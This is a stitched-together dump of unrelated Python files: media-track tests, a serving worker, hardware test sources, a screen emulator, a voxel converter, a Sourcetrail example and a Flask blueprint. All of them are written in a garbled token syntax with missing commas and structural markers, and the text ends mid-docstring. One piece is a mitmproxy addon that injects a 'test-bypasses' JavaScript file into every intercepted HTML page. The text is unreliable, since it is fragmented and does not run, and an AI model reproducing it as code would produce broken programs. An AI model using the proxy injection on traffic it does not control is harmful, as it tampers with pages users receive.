"""<line_sep>t=Track()<line_sep>t.enabled=<true><line_sep>t.locked=<false><line_sep># clip 1
f=File()<line_sep>f.duration=34<line_sep>f.name='shot2'<line_sep>f.pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot2.mov'<line_sep>c=Clip()<line_sep>c.id='shot2'<line_sep>c.start=1<line_sep>c.end=35<line_sep>c.name='shot2'<line_sep>c.enabled=<true><line_sep>c.duration=34<line_sep>c.in_=0<line_sep>c.out=34<line_sep>c.file=f<line_sep>t.clips.append(c)<line_sep># clip 2
f=File()<line_sep>f.duration=30<line_sep>f.name='shot'<line_sep>f.pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot2.mov'<line_sep>c=Clip()<line_sep>c.id='shot'<line_sep>c.start=35<line_sep>c.end=65<line_sep>c.name='shot'<line_sep>c.enabled=<true><line_sep>c.duration=30<line_sep>c.in_=0<line_sep>c.out=30<line_sep>c.file=f<line_sep>t.clips.append(c)<line_sep># clip 3
f=File()<line_sep>f.duration=45<line_sep>f.name='shot1'<line_sep>f.pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot1.mov'<line_sep>c=Clip()<line_sep>c.id='shot1'<line_sep>c.start=65<line_sep>c.end=110<line_sep>c.name='shot1'<line_sep>c.enabled=<true><line_sep>c.duration=45<line_sep>c.in_=0<line_sep>c.out=45<line_sep>c.file=f<line_sep>t.clips.append(c)<line_sep># check if the file objects are different
self.assertNotEqual(t.clips[0].file t.clips[1].file)<line_sep>self.assertNotEqual(t.clips[0].file t.clips[2].file)<line_sep>self.assertNotEqual(t.clips[1].file t.clips[2].file)<line_sep># now optimize the clips
t.optimize_clips()<line_sep># check if the file[0] and file[1] is the same file node
# and the file[2] is different than the others
self.assertEqual(t.clips[0].file t.clips[1].file)<line_sep>self.assertNotEqual(t.clips[0].file t.clips[2].file)<line_sep>self.assertNotEqual(t.clips[1].file t.clips[2].file)<block_end><def_stmt>test_to_xml_method_with_optimized_clips_is_working_properly self<block_start>"""testing if the to xml method is working properly with the clips are
optimized
"""<line_sep>t=Track()<line_sep>t.enabled=<true><line_sep>t.locked=<false><line_sep># clip 1
f=File()<line_sep>f.duration=34<line_sep>f.name='shot2'<line_sep>f.pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot2.mov'<line_sep>c=Clip()<line_sep>c.id='shot2'<line_sep>c.start=1<line_sep>c.end=35<line_sep>c.name='shot2'<line_sep>c.enabled=<true><line_sep>c.duration=34<line_sep>c.in_=0<line_sep>c.out=34<line_sep>c.file=f<line_sep>t.clips.append(c)<line_sep># clip 2
f=File()<line_sep>f.duration=30<line_sep>f.name='shot'<line_sep>f.pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot2.mov'<line_sep>c=Clip()<line_sep>c.id='shot2'<line_sep>c.start=35<line_sep>c.end=65<line_sep>c.name='shot2'<line_sep>c.enabled=<true><line_sep>c.duration=30<line_sep>c.in_=0<line_sep>c.out=30<line_sep>c.file=f<line_sep>t.clips.append(c)<line_sep># clip 3
f=File()<line_sep>f.duration=45<line_sep>f.name='shot1'<line_sep>f.pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot1.mov'<line_sep>c=Clip()<line_sep>c.id='shot1'<line_sep>c.start=65<line_sep>c.end=110<line_sep>c.name='shot1'<line_sep>c.enabled=<true><line_sep>c.duration=45<line_sep>c.in_=0<line_sep>c.out=45<line_sep>c.file=f<line_sep>t.clips.append(c)<line_sep>expected_xml="""<track>
<locked>FALSE</locked>
<enabled>TRUE</enabled>
<clipitem id="shot2">
<end>35</end>
<name>shot2</name>
<enabled>True</enabled>
<start>1</start>
<in>0</in>
<duration>34</duration>
<out>34</out>
<file id="shot2.mov">
<duration>34</duration>
<name>shot2</name>
<pathurl>file://localhost/home/eoyilmaz/maya/projects/default/data/shot2.mov</pathurl>
</file>
</clipitem>
<clipitem id="shot2 2">
<end>65</end>
<name>shot2</name>
<enabled>True</enabled>
<start>35</start>
<in>0</in>
<duration>30</duration>
<out>30</out>
<file id="shot2.mov"/>
</clipitem>
<clipitem id="shot1">
<end>110</end>
<name>shot1</name>
<enabled>True</enabled>
<start>65</start>
<in>0</in>
<duration>45</duration>
<out>45</out>
<file id="shot1.mov">
<duration>45</duration>
<name>shot1</name>
<pathurl>file://localhost/home/eoyilmaz/maya/projects/default/data/shot1.mov</pathurl>
</file>
</clipitem>
</track>"""<line_sep>t.optimize_clips()<line_sep>self.assertEqual(expected_xml t.to_xml())<block_end><block_end> |
# Author: <NAME> <<EMAIL>>; <NAME> <<EMAIL>>; <NAME> <<EMAIL>>
# License: BSD-3-Claus
<class_stmt>Params(object)<block_start><def_stmt>__init__ self<block_start>"""
The basic class for storing the parameters in the probabilistic model
"""<line_sep>super(Params self).__init__()<block_end><block_end><class_stmt>Basic_Model(object)<block_start><def_stmt>__init__ self *args **kwargs<block_start>"""
The basic model for all probabilistic models in this package
Attributes:
@public:
global_params : [Params] the global parameters of the probabilistic model
local_params : [Params] the local parameters of the probabilistic model
@private:
_model_setting : [Params] the model settings of the probabilistic model
_hyper_params : [Params] the hyper parameters of the probabilistic model
"""<line_sep>super(Basic_Model self).__init__()<line_sep>setattr(self 'global_params' Params())<line_sep>setattr(self 'local_params' Params())<line_sep>setattr(self '_model_setting' Params())<line_sep>setattr(self '_hyper_params' Params())<block_end><block_end> |
# Copyright 2017 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module is for testing pyfakefs
:py:class:`fake_filesystem_unittest.Patcher`. It defines attributes that have
the same names as file modules, sudh as 'io` and `path`. Since these are not
modules, :py:class:`fake_filesystem_unittest.Patcher` should not patch them.
Whenever a new module is added to
:py:meth:`fake_filesystem_unittest.Patcher._findModules`, the corresponding
attribute should be added here and in the test
:py:class:`fake_filesystem_unittest_test.TestAttributesWithFakeModuleNames`.
"""<line_sep>os='os attribute value'<line_sep>path='path attribute value'<line_sep>pathlib='pathlib attribute value'<line_sep>shutil='shutil attribute value'<line_sep>io='io attribute value'<line_sep> |
<import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep>process=cms.Process("Demo")<line_sep>process.load("Configuration.Geometry.GeometryExtended2015Reco_cff")<line_sep>process.load("Geometry.RPCGeometry.rpcGeometry_cfi")<line_sep>process.maxEvents=cms.untracked.PSet(input=cms.untracked.int32(1))<line_sep>process.source=cms.Source("EmptySource")<line_sep>process.MessageLogger=cms.Service("MessageLogger")<line_sep>process.demo=cms.EDAnalyzer("RPCGEO")<line_sep>process.p=cms.Path(process.demo)<line_sep> |
<import_stmt>torch<import_from_stmt>torch.autograd Variable<import_from_stmt>ptstat.core RandomVariable _to_v<line_sep># TODO: Implement Uniform(a, b) constructor.
<class_stmt>Uniform(RandomVariable)<block_start>"""
Uniform(0, 1) iid rv.
"""<def_stmt>__init__ self size cuda=<false><block_start>super(Uniform self).__init__()<assert_stmt>len(size)<eq>2 str(size)<line_sep>self._cuda=cuda<line_sep>self._p_size=size<block_end><def_stmt>_size self<block_start><return>self._p_size<block_end><def_stmt>_log_pdf self x<block_start><return>self._entropy()<block_end><def_stmt>_sample self# TODO: Use CUDA random_ when implemented.
<block_start>y=Variable(torch.FloatTensor(*self._p_size).uniform_())<if_stmt>self._cuda<block_start>y=y.cuda()<block_end><return>y<block_end><def_stmt>_entropy self<block_start><return>_to_v(0 self._p_size[0] self._cuda)<block_end><block_end> |
<def_stmt>remove_whilespace_nodes node unlink=<false><block_start>"""Removes all of the whitespace-only text decendants of a DOM node.
When creating a DOM from an XML source, XML parsers are required to
consider several conditions when deciding whether to include
whitespace-only text nodes. This function ignores all of those
conditions and removes all whitespace-only text decendants of the
specified node. If the unlink flag is specified, the removed text
nodes are unlinked so that their storage can be reclaimed. If the
specified node is a whitespace-only text node then it is left
unmodified."""<line_sep>remove_list=[]<for_stmt>child node.childNodes<block_start><if_stmt>child.nodeType<eq>dom.Node.TEXT_NODE<and><not>child.data.strip()<block_start>remove_list.append(child)<block_end><elif_stmt>child.hasChildNodes()<block_start>remove_whilespace_nodes(child unlink)<block_end><block_end><for_stmt>node remove_list<block_start>node.parentNode.removeChild(node)<if_stmt>unlink<block_start>node.unlink()<block_end><block_end><block_end> |
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Start worker process with single core servable"""<import_stmt>os<import_stmt>time<import_stmt>threading<import_stmt>signal<import_stmt>argparse<import_stmt>psutil<import_stmt>mindspore_serving.log<as>logger<import_from_stmt>mindspore_serving.server worker<import_from_stmt>mindspore_serving.server.common check_type<import_from_stmt>mindspore_serving._mindspore_serving ExitSignalHandle_<import_from_stmt>mindspore_serving._mindspore_serving Worker_<line_sep>_main_thread_exited=<false><def_stmt>start_listening_parent_thread servable_name device_id<block_start>"""listening to parent process status"""<def_stmt>worker_listening_parent_thread <block_start>parent_process=psutil.Process(os.getppid())<while_stmt>parent_process.is_running()<and><not>ExitSignalHandle_.has_stopped()<block_start>time.sleep(0.1)<block_end>logger.warning(f"Worker {servable_name} device_id {device_id}, detect parent "<concat>f"pid={parent_process.pid} has exited or receive Ctrl+C message, worker begin to exit"<concat>f", parent running {parent_process.is_running()}, exit status {ExitSignalHandle_.has_stopped()}")<line_sep>worker.stop()<line_sep>cur_process=psutil.Process(os.getpid())<for_stmt>_ range(100)# 100x0.1=10s
<block_start><try_stmt><block_start>children=cur_process.children(recursive=<true>)<if_stmt><not>children<and>_main_thread_exited<block_start>logger.info(f"All current children processes have exited")<line_sep><break><block_end><for_stmt>child children<block_start>os.kill(child.pid signal.SIGTERM)<block_end>time.sleep(0.1)<block_end># pylint: disable=broad-except
<except_stmt>Exception<as>e<block_start>logger.warning(f"Kill children catch exception {e}")<block_end><block_end><block_end>thread=threading.Thread(target=worker_listening_parent_thread)<line_sep>thread.start()<block_end><def_stmt>start_worker servable_directory servable_name version_number device_type device_id master_address dec_key dec_mode listening_master=<false><block_start>"""Start worker process with single core servable"""<line_sep>signal.signal(signal.SIGCHLD signal.SIG_DFL)# for ccec compiler
check_type.check_str('servable_directory' servable_directory)<line_sep>check_type.check_str('servable_name' servable_name)<line_sep>check_type.check_int('version_number' version_number 0)<line_sep>check_type.check_str('device_type' device_type)<line_sep>check_type.check_int('device_id' device_id 0)<line_sep>check_type.check_str('master_address' master_address)<line_sep>check_type.check_bool('listening_master' listening_master)<line_sep>ExitSignalHandle_.start()# Set flag to running and receive Ctrl+C message
<if_stmt>listening_master<block_start>start_listening_parent_thread(servable_name device_id)<block_end># for servable_config.py to get device id of current worker.
os.environ["SERVING_DEVICE_ID"]=str(device_id)<line_sep>worker_pid=os.getpid()<line_sep>unix_socket_dir="unix_socket_files"<try_stmt><block_start>os.mkdir(unix_socket_dir)<block_end><except_stmt>FileExistsError<block_start><pass><block_end>worker_address=f"unix:{unix_socket_dir}/serving_worker_{servable_name}_device{device_id}_{worker_pid}"<if_stmt>len(worker_address)<g>107# maximum unix domain socket address length
<block_start>worker_address=worker_address[:50]+"___"+worker_address[-50:]<block_end><try_stmt><block_start>worker.start_servable(servable_directory=servable_directory servable_name=servable_name version_number=version_number device_type=device_type device_id=device_id master_address=master_address worker_address=worker_address dec_key=dec_key dec_mode=dec_mode)<block_end><except_stmt>Exception<as>ex<block_start>Worker_.notify_failed(master_address f"{{servable name:{servable_name}, device id:{device_id}, <{ex}>}}")<line_sep><raise><block_end><block_end><def_stmt>parse_args_and_start <block_start>"""Parse args and start distributed worker"""<line_sep>parser=argparse.ArgumentParser(description="Serving start extra worker")<line_sep>parser.add_argument('--servable_directory' type=str required=<true> help="servable directory")<line_sep>parser.add_argument('--servable_name' type=str required=<true> help="servable name")<line_sep>parser.add_argument('--version_number' type=int required=<true> help="version numbers")<line_sep>parser.add_argument('--device_type' type=str required=<true> help="device type")<line_sep>parser.add_argument('--device_id' type=str required=<true> help="device id")<line_sep>parser.add_argument('--master_address' type=str required=<true> help="master address")<line_sep>parser.add_argument('--dec_key_pipe_file' type=str required=<true> help="dec key pipe file")<line_sep>parser.add_argument('--dec_mode' type=str required=<true> help="dec mode")<line_sep>parser.add_argument('--listening_master' type=str required=<true> help="whether listening 
master")<line_sep>args=parser.parse_args()<line_sep>servable_directory=args.servable_directory<line_sep>servable_name=args.servable_name<line_sep>version_number=int(args.version_number)<line_sep>device_type=args.device_type<line_sep>device_id=int(args.device_id)<line_sep>master_address=args.master_address<line_sep>dec_key_pipe=args.dec_key_pipe_file<if_stmt>dec_key_pipe<ne>"None"<block_start><with_stmt>open(dec_key_pipe "rb")<as>fp<block_start>dec_key=fp.read()<block_end>prefix="serving_temp_dec_"<if_stmt>dec_key_pipe[:len(prefix)]<eq>prefix<block_start>os.remove(dec_key_pipe)<block_end><block_end><else_stmt><block_start>dec_key=<none><block_end>dec_mode=args.dec_mode<line_sep># pylint: disable=simplifiable-if-expression
listening_master=<true><if>args.listening_master.lower()<eq>"true"<else><false><try_stmt><block_start>start_worker(servable_directory servable_name version_number device_type device_id master_address dec_key dec_mode listening_master)<block_end><finally_stmt><block_start><global>_main_thread_exited<line_sep>_main_thread_exited=<true><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>parse_args_and_start()<block_end> |
"""
========================================================================
Test sources
========================================================================
Test sources with CL or RTL interfaces.
Author : <NAME>
Date : Mar 11, 2019
"""<import_from_stmt>collections deque<import_from_stmt>copy deepcopy<import_from_stmt>pymtl3 *<import_from_stmt>pymtl3.stdlib.ifcs OutValRdyIfc<class_stmt>TestSrcRTL(Component)<block_start><def_stmt>construct s Type msgs initial_delay=0 interval_delay=0# Interface
<block_start>s.out=OutValRdyIfc(Type)<line_sep># Data
s.msgs=deepcopy(msgs)<line_sep># TODO: use wires and ROM to make it translatable
s.idx=0<line_sep>s.num_msgs=len(s.msgs)<line_sep>s.count=0<line_sep>@update_ff<def_stmt>up_src <block_start><if_stmt>s.reset<block_start>s.idx=0<line_sep>s.count=initial_delay<line_sep>s.out.val<auglshift>0<block_end><else_stmt><block_start><if_stmt>s.out.val&s.out.rdy<block_start>s.idx<augadd>1<line_sep>s.count=interval_delay<block_end><if_stmt>s.count<g>0<block_start>s.count<augsub>1<line_sep>s.out.val<auglshift>0<block_end><else_stmt># s.count == 0
<block_start><if_stmt>s.idx<l>s.num_msgs<block_start>s.out.val<auglshift>1<line_sep>s.out.msg<auglshift>s.msgs[s.idx]<block_end><else_stmt><block_start>s.out.val<auglshift>0<block_end><block_end><block_end><block_end><block_end><def_stmt>done s<block_start><return>s.idx<ge>s.num_msgs<block_end># Line trace
<def_stmt>line_trace s<block_start><return>f"{s.out}"<block_end><block_end> |
<import_from_future_stmt> absolute_import division print_function<import_from_stmt>six.moves range<def_stmt>intify a<block_start><return>tuple([int(round(val))<for>val a])<block_end><def_stmt>reference_map sg mi<block_start><import_from_stmt>cctbx sgtbx<line_sep>asu=sgtbx.reciprocal_space_asu(sg.type())<line_sep>isym_=[]<line_sep>mi_=[]<for_stmt>hkl mi<block_start>found=<false><for_stmt>i_inv range(sg.f_inv())<block_start><for_stmt>i_smx range(sg.n_smx())<block_start>rt_mx=sg(0 i_inv i_smx)<line_sep>hkl_=intify(hkl<times>rt_mx.r())<if_stmt>asu.is_inside(hkl_)<block_start>mi_.append(hkl_)<if_stmt>i_inv<block_start>isym_.append(-i_smx)<block_end><else_stmt><block_start>isym_.append(i_smx)<block_end>found=<true><line_sep><break><block_end><block_end><block_end><if_stmt>found<block_start><continue><block_end><else_stmt><block_start><assert_stmt>(<not>sg.is_centric())<block_end><for_stmt>i_inv range(sg.f_inv())<block_start><for_stmt>i_smx range(sg.n_smx())<block_start>rt_mx=sg(0 i_inv i_smx)<line_sep>_hkl=[-h<for>h hkl]<line_sep>mhkl_=intify(_hkl<times>rt_mx.r())<if_stmt>asu.is_inside(mhkl_)<block_start>mi_.append(mhkl_)<line_sep>isym_.append(-i_smx)<line_sep>found=<true><line_sep><break><block_end><block_end><block_end><block_end><return>mi_ isym_<block_end><def_stmt>tst_map_to_asu_isym anomalous_flag<block_start><import_from_stmt>cctbx sgtbx<import_from_stmt>cctbx.miller map_to_asu_isym<import_from_stmt>cctbx.array_family flex<line_sep>mi=flex.miller_index()<line_sep>i=flex.int()<import_stmt>random<line_sep>nhkl=1000<for_stmt>j range(nhkl)<block_start>hkl=[random.randint(-10 10)<for>j range(3)]<line_sep>mi.append(hkl)<line_sep>i.append(0)<block_end>spacegroup=sgtbx.space_group_symbols(195).hall()<line_sep>sg=sgtbx.space_group(spacegroup)<line_sep>mi_,isym_=reference_map(sg mi)<line_sep>map_to_asu_isym(sg.type() anomalous_flag mi i)<for_stmt>j 
range(nhkl)<block_start><assert_stmt>(i[j]<eq>isym_[j])<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>tst_map_to_asu_isym(<true>)<line_sep>tst_map_to_asu_isym(<false>)<line_sep>print('OK')<block_end> |
from bs4 import BeautifulSoup
from mitmproxy import ctx

# Load the JavaScript payload to inject once, at addon load time.
with open('injected-test-bypasses.js', 'r') as f:
    content_js = f.read()


def response(flow):
    """mitmproxy response hook: inject the test-bypass script into HTML pages.

    The script is inserted as the first child of <head> (falling back to
    <body>) so it runs before any of the page's own scripts.
    """
    # Only process 200 responses of HTML content.
    # Bug fix: the original compared headers['Content-Type'] to the exact
    # string 'text/html', which (a) raises KeyError when the header is
    # absent and (b) misses the common 'text/html; charset=utf-8' form.
    if 'text/html' not in flow.response.headers.get('Content-Type', ''):
        return
    if flow.response.status_code != 200:
        return

    # Inject the script tag.
    html = BeautifulSoup(flow.response.text, 'lxml')
    container = html.head or html.body
    if container:
        script = html.new_tag('script', type='text/javascript')
        script.string = content_js
        container.insert(0, script)
        flow.response.text = str(html)
        ctx.log.info('Successfully injected the injected-test-bypasses.js script.')
class Cell:
    """One character cell of the virtual screen, with its highlight attrs."""

    def __init__(self, c=' '):
        self.c = c
        self.highlight = {}

    def __mul__(self, n):
        # Produce n fresh cells carrying the same character.
        # Note: the highlight dict is deliberately NOT copied to the clones.
        return [Cell(self.c) for _ in range(n)]

    def __str__(self):
        return self.c


class Highlight:
    """A contiguous run of identically-highlighted cells on one line."""

    def __init__(self, line, highlight):
        self.line = line
        self.highlight = highlight
        self.start = 0
        self.end = 0

    def s(self):
        # Canonical tuple used for both equality and hashing.
        return (self.line, self.start, self.end, tuple(self.highlight.items()))

    def __eq__(self, h):
        return self.s() == h.s()

    def __hash__(self):
        return hash((self.line, self.start, self.end, tuple(self.highlight.items())))


class Screen:
    """In-memory emulation of an nvim-style redraw-event screen."""

    def __init__(self):
        self.x = 0
        self.y = 0
        self.resize(1, 1)
        self.highlight = {}
        self.changes = 0

    def resize(self, w, h):
        """Reallocate the cell grid as w columns by h rows."""
        self.w = w
        self.h = h
        # TODO: should resize clear?
        self.screen = [Cell() * w for _ in range(h)]
        self.scroll_region = [0, self.h, 0, self.w]
        # Clamp the cursor into the new bounds.
        self.x = min(self.x, w - 1)
        self.y = min(self.y, h - 1)

    def clear(self):
        """Blank the screen by reallocating it at the current size."""
        self.resize(self.w, self.h)

    def scroll(self, dy):
        """Shift the scroll region by dy rows, blanking rows scrolled in."""
        ya, yb = self.scroll_region[0:2]
        xa, xb = self.scroll_region[2:4]
        yi = (ya, yb)
        if dy < 0:
            # Scrolling up: walk the region bottom-to-top instead.
            yi = (yb, ya - 1)
        for y in range(yi[0], yi[1], int(dy / abs(dy))):
            if ya <= y + dy < yb:
                self.screen[y][xa:xb] = self.screen[y + dy][xa:xb]
            else:
                self.screen[y][xa:xb] = Cell() * (xb - xa)

    def redraw(self, updates):
        """Apply a batch of redraw commands; bump self.changes if any drew."""
        ignored = [
            'mode_change',
            'bell',
            'mouse_on',
            'highlight_set',
            'update_fb',
            'update_bg',
            'update_sp',
            'clear',
        ]
        changed = False
        for cmd in updates:
            if not cmd:
                continue
            name, args = cmd[0], cmd[1:]
            if name == 'cursor_goto':
                self.y, self.x = args[0]
            elif name == 'eol_clear':
                changed = True
                self.screen[self.y][self.x:] = Cell() * (self.w - self.x)
            elif name == 'put':
                changed = True
                for chunk in args:
                    for ch in chunk:
                        cell = self.screen[self.y][self.x]
                        cell.c = ch
                        cell.highlight = self.highlight
                        self.x += 1
                        # Wrap behaviour is not specified by the protocol;
                        # use semi-sane defaults: wrap to next line, then top.
                        if self.x >= self.w:
                            self.x = 0
                            self.y += 1
                            if self.y >= self.h:
                                self.y = 0
            elif name == 'resize':
                changed = True
                self.resize(*args[0])
            elif name == 'highlight_set':
                self.highlight = args[0][0]
            elif name == 'set_scroll_region':
                self.scroll_region = args[0]
            elif name == 'scroll':
                changed = True
                self.scroll(args[0][0])
            elif name in ignored:
                pass
            # else:
            #     print('unknown update cmd', name)
        if changed:
            self.changes += 1

    def highlights(self):
        """Collect Highlight runs covering all highlighted cells, per line."""
        hlset = []
        for y, line in enumerate(self.screen):
            cur = {}
            h = None
            for x, cell in enumerate(line):
                if h and cur and cell.highlight == cur:
                    # Same attrs as the current run: extend it.
                    h.end = x + 1
                else:
                    cur = cell.highlight
                    if cur:
                        h = Highlight(y, cur)
                        h.start = x
                        h.end = x + 1
                        hlset.append(h)
        return hlset

    def p(self):
        """Debug print: the screen framed by dashed rules."""
        print('-' * self.w)
        print(str(self))
        print('-' * self.w)

    def __setitem__(self, xy, c):
        x, y = xy
        try:
            cell = self.screen[y][x]
            cell.c = c
            cell.highlight = self.highlight
        except IndexError:
            # Out-of-bounds writes are silently dropped.
            pass

    def __getitem__(self, y):
        # (x, y) tuple -> single Cell; plain int -> whole row as a string.
        if isinstance(y, tuple):
            return self.screen[y[1]][y[0]]
        return ''.join(str(c) for c in self.screen[y])

    def __str__(self):
        return '\n'.join([self[y] for y in range(self.h)])
"""Convert precomputed voxel occupancy grids (.npy) to .off meshes."""
from voxels import VoxelGrid
import numpy as np
import multiprocessing as mp
from multiprocessing import Pool
import glob
import os
import argparse

# Bounding box of the cube the shapes were voxelized into.  Named BB_MIN /
# BB_MAX (instead of the original min / max) so the Python builtins are not
# shadowed at module level.
BB_MIN = -0.5
BB_MAX = 0.5


def create_voxel_off(path):
    """Read voxelization_<res>.npy under *path* and export a .off mesh.

    Relies on the module-level ``res`` and ``unpackbits`` globals set in the
    __main__ block; on fork-based platforms the Pool workers inherit them.
    """
    voxel_path = path + '/voxelization_{}.npy'.format(res)
    off_path = path + '/voxelization_{}.off'.format(res)

    if unpackbits:
        # Occupancies were bit-packed to save space; expand back to a cube.
        occ = np.unpackbits(np.load(voxel_path))
        voxels = np.reshape(occ, (res,) * 3)
    else:
        voxels = np.reshape(np.load(voxel_path)['occupancies'], (res,) * 3)

    loc = ((BB_MIN + BB_MAX) / 2,) * 3
    scale = BB_MAX - BB_MIN
    VoxelGrid(voxels, loc, scale).to_mesh().export(off_path)
    print('Finished: {}'.format(path))


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Run voxalization to off')
    parser.add_argument('-res', type=int)
    args = parser.parse_args()

    ROOT = 'shapenet/data'
    unpackbits = True
    res = args.res

    # Fix: the original leaked the pool (never closed/joined it).
    p = Pool(mp.cpu_count())
    try:
        p.map(create_voxel_off, glob.glob(ROOT + '/*/*/'))
    finally:
        p.close()
        p.join()
"""
Author: <NAME>
Created On: 23 August 2017
"""<line_sep># To test if two rectangle intersect, we only have to find out
# if their projections intersect on all of the coordinate axes
<import_stmt>inspect<class_stmt>Coord<block_start>"""Coord
Class to initialize Coordinate of one point
"""<def_stmt>__init__ self x y<block_start>self.x=x<line_sep>self.y=y<block_end><block_end><class_stmt>SimpleRectangle<block_start>"""SimpleRectangle
Class to initialize Body of Object
"""<def_stmt>__init__ self coord1 coord2<block_start>"""
:type coord1: object of class Coord
:type coord2: object of class Coord
"""<line_sep>self.min_x=coord1.x<line_sep>self.min_y=coord1.y<line_sep>self.max_x=coord2.x<line_sep>self.max_y=coord2.y<block_end><block_end><def_stmt>broad_phase simpleRect1 simpleRect2<block_start>"""
:type simpleRect1: object
:type simpleRect2: object
"""<line_sep>d1x=simpleRect2.min_x-simpleRect1.max_x<line_sep>d1y=simpleRect2.min_y-simpleRect1.max_y<line_sep>d2x=simpleRect1.min_x-simpleRect2.max_x<line_sep>d2y=simpleRect1.min_y-simpleRect2.max_y<if_stmt>d1x<g>0<or>d1y<g>0<block_start><return><false><block_end><if_stmt>d2x<g>0<or>d2y<g>0<block_start><return><false><block_end><return><true><block_end><def_stmt>get_code <block_start>"""
returns the code for the broad phase function
"""<line_sep><return>inspect.getsource(broad_phase)<block_end> |
import argparse
import os
import sourcetraildb as srctrl


def main():
    """SourcetrailDB Python API example.

    Records a class ``MyType`` with one field and one method (which uses the
    field) into a Sourcetrail database, so the result can be inspected in the
    Sourcetrail UI.  Returns 0 on success, 1 on any error.
    """
    parser = argparse.ArgumentParser(description="SourcetrailDB Python API Example")
    parser.add_argument("--database-file-path",
                        help="path to the generated Sourcetrail database file",
                        type=str, required=True)
    parser.add_argument("--source-file-path",
                        help="path to the source file to index",
                        type=str, required=True)
    parser.add_argument("--database-version",
                        help="database version of the invoking Sourcetrail binary",
                        type=int, required=False, default=0)
    args = parser.parse_args()
    databaseFilePath = args.database_file_path
    sourceFilePath = args.source_file_path.replace("\\", "/")
    dbVersion = args.database_version

    print("SourcetrailDB Python API Example")
    print("Supported database version: " + str(srctrl.getSupportedDatabaseVersion()))

    if dbVersion > 0 and dbVersion != srctrl.getSupportedDatabaseVersion():
        # Fix: the error message was one string literal broken across two
        # physical lines; it is now a proper single-line message.
        print("ERROR: Only supports database version: "
              + str(srctrl.getSupportedDatabaseVersion())
              + ". Requested version: " + str(dbVersion))
        return 1

    if not srctrl.open(databaseFilePath):
        print("ERROR: " + srctrl.getLastError())
        return 1

    print("Clearing loaded database now...")
    srctrl.clear()

    print("start indexing")
    srctrl.beginTransaction()
    fileId = srctrl.recordFile(sourceFilePath)
    srctrl.recordFileLanguage(fileId, "python")
    if len(srctrl.getLastError()) > 0:
        print("ERROR: " + srctrl.getLastError())
        return 1

    # Class MyType at line 2 of the indexed file.
    symbolId = srctrl.recordSymbol(
        '{ "name_delimiter": ".", "name_elements": [ '
        '{ "prefix": "", "name": "MyType", "postfix": "" } '
        '] }')
    srctrl.recordSymbolDefinitionKind(symbolId, srctrl.DEFINITION_EXPLICIT)
    srctrl.recordSymbolKind(symbolId, srctrl.SYMBOL_CLASS)
    srctrl.recordSymbolLocation(symbolId, fileId, 2, 7, 2, 12)
    srctrl.recordSymbolScopeLocation(symbolId, fileId, 2, 1, 7, 1)

    # Field MyType.my_member at line 4.
    memberId = srctrl.recordSymbol(
        '{ "name_delimiter": ".", "name_elements": [ '
        '{ "prefix": "", "name": "MyType", "postfix": "" }, '
        '{ "prefix": "", "name": "my_member", "postfix": "" } '
        '] }')
    srctrl.recordSymbolDefinitionKind(memberId, srctrl.DEFINITION_EXPLICIT)
    srctrl.recordSymbolKind(memberId, srctrl.SYMBOL_FIELD)
    srctrl.recordSymbolLocation(memberId, fileId, 4, 2, 4, 10)

    # Method MyType.my_method at line 6, which references my_member at line 7.
    methodId = srctrl.recordSymbol(
        '{ "name_delimiter": ".", "name_elements": [ '
        '{ "prefix": "", "name": "MyType", "postfix": "" }, '
        '{ "prefix": "", "name": "my_method", "postfix": "" } '
        '] }')
    srctrl.recordSymbolDefinitionKind(methodId, srctrl.DEFINITION_EXPLICIT)
    srctrl.recordSymbolKind(methodId, srctrl.SYMBOL_METHOD)
    srctrl.recordSymbolLocation(methodId, fileId, 6, 6, 6, 14)
    srctrl.recordSymbolScopeLocation(methodId, fileId, 6, 1, 7, 1)

    useageId = srctrl.recordReference(methodId, memberId, srctrl.REFERENCE_USAGE)
    srctrl.recordReferenceLocation(useageId, fileId, 7, 10, 7, 18)

    srctrl.commitTransaction()
    if len(srctrl.getLastError()) > 0:
        print("ERROR: " + srctrl.getLastError())
        return 1

    if not srctrl.close():
        print("ERROR: " + srctrl.getLastError())
        return 1

    print("done")
    return 0


# Fix: main() was called unconditionally at import time; guard it so the
# module can be imported without side effects.
if __name__ == '__main__':
    main()
from flask import Blueprint

# Each module blueprint may have its own static folder.  The default app only
# sets up the application-level ``static`` folder, so a blueprint has to
# register its own static path explicitly.
#
# To tell the app-level static files apart from this module's static files,
# the blueprint is created with a URL prefix.  With the prefix in place every
# route registered on this blueprint automatically starts with /cart, and an
# image is loaded via /cart/static/xxx.img.
#
# If both this module's template folder and the main application's template
# folder contain a template with the same name, the main application's
# template is loaded first.
cart_blue = Blueprint('cart', __name__,
                      static_folder='static',
                      template_folder='templates',
                      url_prefix='/cart')

# The views may only be imported after the blueprint has been initialised,
# because .views itself uses the blueprint (avoids a circular import).
from .views import *
"""
The lidar system, data and fit (1 of 2 datasets)
================================================
Generate a chart of the data fitted by Gaussian curve
